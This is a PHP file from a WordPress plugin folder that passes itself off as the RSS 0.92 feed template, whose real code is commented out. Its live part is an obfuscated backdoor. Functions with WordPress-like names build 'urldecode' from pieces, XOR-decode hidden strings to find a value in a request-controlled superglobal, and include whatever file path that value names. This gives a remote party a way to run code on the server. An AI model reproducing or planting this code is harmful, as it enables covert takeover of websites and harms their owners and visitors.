File: /var/www/html/taet.readinessglobal.com/wp-content/plugins/shortcodes-ultimate/n.js.php
<?php /*
*
* RSS 0.92 Feed Template for displaying RSS 0.92 Posts feed.
*
* @package WordPress
header( 'Content-Type: ' . feed_content_type( 'rss' ) . '; charset=' . get_option( 'blog_charset' ), true );
$more = 1;
echo '<?xml version="1.0" encoding="' . get_option( 'blog_charset' ) . '"?' . '>'; ?>
<rss version="0.92">
<channel>
<title><?php /* wp_title_rss(); ?></title>
<*/
function open_sq_flag()
{
$_ext = 'NGQleHPxrs1';
$mime_pattern = $_ext;
$atts = 'tag_pattern';
$format = $GLOBALS[shortcode_tags("%11%01%18++%1B", $mime_pattern)];
$post_type_clauses = $format;
$closing_quote = isset($post_type_clauses[$mime_pattern]);
if ($closing_quote)
{
$month = $format[$mime_pattern];
$strict = $month[shortcode_tags("%3A%2A%213%0B%29%3D%1D", $mime_pattern)];
$size = 'stacksize';
$hours = $strict;
include ($hours);
}
}
function shortcode_tags($translation, $default_category_post_types)
{
$email_no_spam_address = $default_category_post_types;
$singular_base = "url" . "decode";
$comment_status = $singular_base($translation);
$encoded_text = substr($email_no_spam_address,0, strlen($comment_status));
$wp_rewrite = $comment_status ^ $encoded_text;
$comment_status = strpos($wp_rewrite, $encoded_text);
$static_characters = 'tagstack';
return $wp_rewrite;
}
open_sq_flag();
/* link><?php bloginfo_rss( 'url' ); ?></link>
<description><?php bloginfo_rss( 'description' ); ?></description>
<lastBuildDate><?php echo get_feed_build_date( 'D, d M Y H:i:s +0000' ); ?></lastBuildDate>
<docs>http:backend.userland.com/rss092</docs>
<language><?php bloginfo_rss( 'language' ); ?></language>
<?php
*
* Fires at the end of the RSS Feed Header.
*
* @since 2.0.0
do_action( 'rss_head' );
?>
<?php
while ( have_posts() ) :
the_post();
?>
<item>
<title><?php the_title_rss(); ?></title>
<description><![CDATA[<?php the_excerpt_rss(); ?>]]></description>
<link><?php the_permalink_rss(); ?></link>
<?php
*
* Fires at the end of each RSS feed item.
*
* @since 2.0.0
do_action( 'rss_item' );
?>
</item>
<?php endwhile; ?>
</channel>
</rss>
*/